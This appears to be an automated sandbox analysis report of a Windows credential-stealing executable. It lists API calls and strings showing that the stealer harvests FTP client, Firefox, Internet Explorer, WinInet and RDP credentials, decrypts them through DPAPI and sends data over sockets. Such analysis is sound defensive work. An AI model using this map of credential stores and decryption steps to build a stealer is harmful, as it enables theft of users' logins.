                  • API ID: closesocketconnectsocket
                  • String ID:
                  • API String ID: 643388700-0
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3F3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F350
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  APIs
                  • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                  • EasyFTP, xrefs: 0040CBA3
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                  • API String ID: 1884169789-2776585315
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                  Similarity
                  • API ID: AllocFolderLocalPath
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1254228173-2036018995
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                  • String ID: \32BitFtp.ini
                  • API String ID: 2776971706-1260517637
                  • Opcode ID: 2172a12cec20e8989506aa072c9d44529240a4debc3839429db8f461b9dd07ec
                  • Instruction ID: a11a2e049d2e365c2248b7b9670d3b2c2be4735807615fd35c230b82605c2c15
                  • Opcode Fuzzy Hash: 2172a12cec20e8989506aa072c9d44529240a4debc3839429db8f461b9dd07ec
                  • Instruction Fuzzy Hash: E0F0A770A00108BAEF10BBA1CC42FDE7A6DDF40744F104077B704B51E2EAB9AF809A9D
                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 004024DF
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                  • Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
                  • Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                  • Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: lstrlen
                  • String ID: .xml
                  • API String ID: 1659193697-2937849440
                  • Opcode ID: 401139ce8e518b5a66182d8524dd3e509ec127c3cd5639ab2dcfbf6fe49c8e38
                  • Instruction ID: 0e88fc64eb5edec90800b857d6d99b28fd0d3498d5337a762e7c0bf7a734747b
                  • Opcode Fuzzy Hash: 401139ce8e518b5a66182d8524dd3e509ec127c3cd5639ab2dcfbf6fe49c8e38
                  • Instruction Fuzzy Hash: A3F03A32D00108FADF11FBD1CC42ECDBB76AB50308F208566B621B51B0D7B99BA4EB48
                  APIs
                  • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
                  • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CloseExitHandleProcess
                  • String ID:
                  • API String ID: 1046136549-0
                  • Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                  • Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
                  • Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                  • Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C
                  APIs
                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401FC6
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401FE1
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: EnvironmentExpandLocalStrings$AllocFree
                  • String ID:
                  • API String ID: 2376306162-0
                  • Opcode ID: 7ce35d40b8dc15902d1d11a738015c704fa05c54261905a4e1f541725c681a4a
                  • Instruction ID: d8336d695edfc154b3b45a9711e618b47250add4b5adda8f5b079a4b1d77d4f2
                  • Opcode Fuzzy Hash: 7ce35d40b8dc15902d1d11a738015c704fa05c54261905a4e1f541725c681a4a
                  • Instruction Fuzzy Hash: 1CE0ED7190410AFAEB10BAB59D02BAE7A69AB00358F20453A7504F51E1DBB99F60A668
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: gethostbynameinet_addr
                  • String ID:
                  • API String ID: 1594361348-0
                  • Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                  • Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
                  • Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                  • Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749
                  APIs
                  • connect.WS2_32(00000000,00000002,00000010), ref: 0040386B
                  • closesocket.WS2_32(00000000), ref: 00403876
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: closesocketconnect
                  • String ID:
                  • API String ID: 1323028321-0
                  • Opcode ID: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                  • Instruction ID: 2c0b4ed7b26df5b6c8b3ddf8a33cbfcd02c62134e5053cecd8bd2a5708bf71a2
                  • Opcode Fuzzy Hash: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                  • Instruction Fuzzy Hash: B5D0C972A042046AD700BABA5CC1EBEA69CAF10328F109A7BB526E51C2D5BCC584D629
                  APIs
                  • GetTickCount.KERNEL32 ref: 0041062F
                  • ExitProcess.KERNEL32(00000000), ref: 0041064D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: 313bf66b5dfe05952b25d2840f572e1741d7572e0e6d598ccf12f7a4ae9acd8d
                  • Instruction ID: 1fdb523825d5533d52b5a783dd64089226d452954fd390a664e9fec20cc3f53c
                  • Opcode Fuzzy Hash: 313bf66b5dfe05952b25d2840f572e1741d7572e0e6d598ccf12f7a4ae9acd8d
                  • Instruction Fuzzy Hash: 9CD0C93075D2809AD3956762996A7EA36124BE6309F1581AFE009490938DED0AE6462F
                  APIs
                  • send.WSOCK32(?,?,00000000,00000000), ref: 004038AB
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: send
                  • String ID:
                  • API String ID: 2809346765-0
                  • Opcode ID: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                  • Instruction ID: 7010a4d4224b84c81328f756437b4738d149add1ed75441a8268b8f5070a40e4
                  • Opcode Fuzzy Hash: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                  • Instruction Fuzzy Hash: 4BF0E533614308ABEB106E15CC40B9B3B9CEB90759F14883BF901A62C0D3BDDA958359
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                  • Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
                  • Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                  • Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795
                  APIs
                  • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: select
                  • String ID:
                  • API String ID: 1274211008-0
                  • Opcode ID: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                  • Instruction ID: 10b725986883f22aabceafb6b3feb490bf47cb93175d073b1889671c1eb66941
                  • Opcode Fuzzy Hash: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                  • Instruction Fuzzy Hash: 59F03075500518AEDF20CF50CC81BEABBB8EB14328F1041A2E598E52D0E7F99BC48F95
                  APIs
                  • WSAStartup.WS2_32(00000101,?), ref: 00404010
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                  • Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
                  • Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                  • Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA
                  APIs
                  • LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: AllocLocal
                  • String ID:
                  • API String ID: 3494564517-0
                  • Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                  • Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
                  • Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                  • Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD
                  APIs
                  • LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: FreeLocal
                  • String ID:
                  • API String ID: 2826327444-0
                  • Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                  • Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
                  • Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                  • Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 004098CF
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 004098EC
                  • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
                  • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                  • API String ID: 3040542784-1405255088
                  • Opcode ID: 79aa9d010b6a9544d2f1cbe0020f4fc9b9144494d83483410492098334957b8b
                  • Instruction ID: 12bd8378188bb7e1a7194032bae3a414b25258f4a54715fc245deb7fafbe9bd7
                  • Opcode Fuzzy Hash: 79aa9d010b6a9544d2f1cbe0020f4fc9b9144494d83483410492098334957b8b
                  • Instruction Fuzzy Hash: 4E514171941249BADF61BF61CC02EEE7A69EF41308F1080BBB408711F2D6799ED0AE5D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID:
                  • String ID: explorer.exe
                  • API String ID: 0-3187896405
                  • Opcode ID: f7afdcfe744b3e05ab48eaa6f980910a938150a171169030d78f1a6cd7be30cb
                  • Instruction ID: 57b851390ac6ff9d3df1dc865e97f222bf2379d97e48b75dd5cfef461e8c138c
                  • Opcode Fuzzy Hash: f7afdcfe744b3e05ab48eaa6f980910a938150a171169030d78f1a6cd7be30cb
                  • Instruction Fuzzy Hash: 84317A30A40208AADF229BA1CD49BEE7BB4AB44344F1040B7E105B11E1DBB99FD4DF58
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                  • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                  • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                  • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                  • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                  • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                  • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                  • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: lstrlen$CryptDataFreeLocalUnprotect
                  • String ID: ftp://$http://$https://
                  • API String ID: 3968356742-2804853444
                  • Opcode ID: 35d07bf2ee0863f22bbc49e801769af40006044562cd22e94c9840ce37007f23
                  • Instruction ID: 98da3cbdc63e8ffab8f2d6ab5e355ebb60933bdd86054fc1250a36d790598718
                  • Opcode Fuzzy Hash: 35d07bf2ee0863f22bbc49e801769af40006044562cd22e94c9840ce37007f23
                  • Instruction Fuzzy Hash: EB51DA72810109FADF11AF91DD41EEE7B7AEF48318F14403AF611B11A1D7799A90DF98
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID:
                  • String ID: 123456
                  • API String ID: 0-158520161
                  • Opcode ID: 2c0b4a8982a1173f3c8a2c55f452ae6bdfa028bd1e6173cb2f604709961d564c
                  • Instruction ID: 4ff08b9673e267ace140181447cf4255118950924d58b97e5f676ee4c44255ff
                  • Opcode Fuzzy Hash: 2c0b4a8982a1173f3c8a2c55f452ae6bdfa028bd1e6173cb2f604709961d564c
                  • Instruction Fuzzy Hash: DA515F70904208EBEF119F91DD86BEDBBB5EB44304F148066E610A91E1C7F99AD4DB29
                  APIs
                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                  • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A615
                  • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                  • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                  • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                  • LocalFree.KERNEL32(?), ref: 0040A6DF
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: lstrcmpi$ByteCharMultiWide$CryptDataFreeLocalUnprotect
                  • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                  • API String ID: 3809606326-3076635702
                  • Opcode ID: e12b3fd39bf32ebbdaaabfaa667b547eaed294adb198a8ef7480dc3e779ae47c
                  • Instruction ID: d8573c41fe4d69a5315fcaad572809c63864cb87822d90682a8830d63048aee8
                  • Opcode Fuzzy Hash: e12b3fd39bf32ebbdaaabfaa667b547eaed294adb198a8ef7480dc3e779ae47c
                  • Instruction Fuzzy Hash: F041067190021DEADF219E50CC46FDA7AB9BF08304F14C0A6F644750D0DBB69AE59FD9
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 004089FA
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00408A17
                  • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
                  • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: 266f601d4f122dd849f925886e07e10c82f98f2873f1fcdb3033ee4c45cf3a36
                  • Instruction ID: 1e30f031303a085b38748eb962b8890ccc3570ea6637a02dba116d6117304564
                  • Opcode Fuzzy Hash: 266f601d4f122dd849f925886e07e10c82f98f2873f1fcdb3033ee4c45cf3a36
                  • Instruction Fuzzy Hash: 5D316D70A00209AADF10BF61CD42AEE7769AF40304F1041BBF458B51F2DB789AD1AE59
                  APIs
                  • lstrlen.KERNEL32(00000000), ref: 0040CEE2
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                  • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID: full address:s:$password 51:b:$username:s:
                  • API String ID: 2920030623-2945746679
                  • Opcode ID: 75af0113992c4346936c86c28b325d0cc1530dd4f7a527af40f7d2e286d8de40
                  • Instruction ID: 18adffc5b52cd1553bccd2a74e548d689630eee789468983d86ff9c335b6abb1
                  • Opcode Fuzzy Hash: 75af0113992c4346936c86c28b325d0cc1530dd4f7a527af40f7d2e286d8de40
                  • Instruction Fuzzy Hash: 6241627290010AEADF11ABE5CD85BEEBF76EF44714F10423BE600711E0D7794A92DB5A
                  APIs
                  • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                  • lstrlenW.KERNEL32(00416363,?,?,00000000), ref: 0040AA1D
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                  • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                  • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                  • String ID: Microsoft_WinInet_*
                  • API String ID: 3891647360-439986189
                  • Opcode ID: 4d1ec1d05e07769bc6f95a99a4758796e5bee459a58f8c94a4a975656dae1d5f
                  • Instruction ID: ee26c8b2c9094d42fdf39799a89538bf129262060b97b76ef5a92aab507a7280
                  • Opcode Fuzzy Hash: 4d1ec1d05e07769bc6f95a99a4758796e5bee459a58f8c94a4a975656dae1d5f
                  • Instruction Fuzzy Hash: 0B311A75900209EAEF21CF84CD05BEEB7B4EB44305F15443AE951762D0D3BC9AA5CBAA
                  APIs
                  • lstrlen.KERNEL32(?), ref: 0040AB39
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                  • LocalFree.KERNEL32(00000000), ref: 0040AC24
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID:
                  • API String ID: 2920030623-0
                  • Opcode ID: ffd0805ddd691e6525886073a3b18e08ec2f0b6ea3480139b18f959a4aefd1c4
                  • Instruction ID: fcc9661cf6c9f3a93b8c2d67c769f64da82f2126ed0d19edb764173fa2cb65c8
                  • Opcode Fuzzy Hash: ffd0805ddd691e6525886073a3b18e08ec2f0b6ea3480139b18f959a4aefd1c4
                  • Instruction Fuzzy Hash: EA31C7776042099FEF209E58D844BCDB776EB85374F504133DA51A62C4D2BCAA92CB4E
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                  • FreeSid.ADVAPI32(?), ref: 00404561
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 96ab053aa60c9289ee76a64f27c419c6e23215ea94b0a4f4e7851c2bc08df489
                  • Instruction ID: c9209d370c91890186ccc20bdf7f066e1e20f6c02a387ff0b76e85c5d3142024
                  • Opcode Fuzzy Hash: 96ab053aa60c9289ee76a64f27c419c6e23215ea94b0a4f4e7851c2bc08df489
                  • Instruction Fuzzy Hash: 11114470544249AEEB11CB98DC0EF9E7BF4AB50309F05C0A5D115AB2E1D3F99508C7AA
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                  • LocalFree.KERNEL32(00000000), ref: 0040445C
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID: CryptDataFreeLocalUnprotect
                  • String ID:
                  • API String ID: 1561624719-0
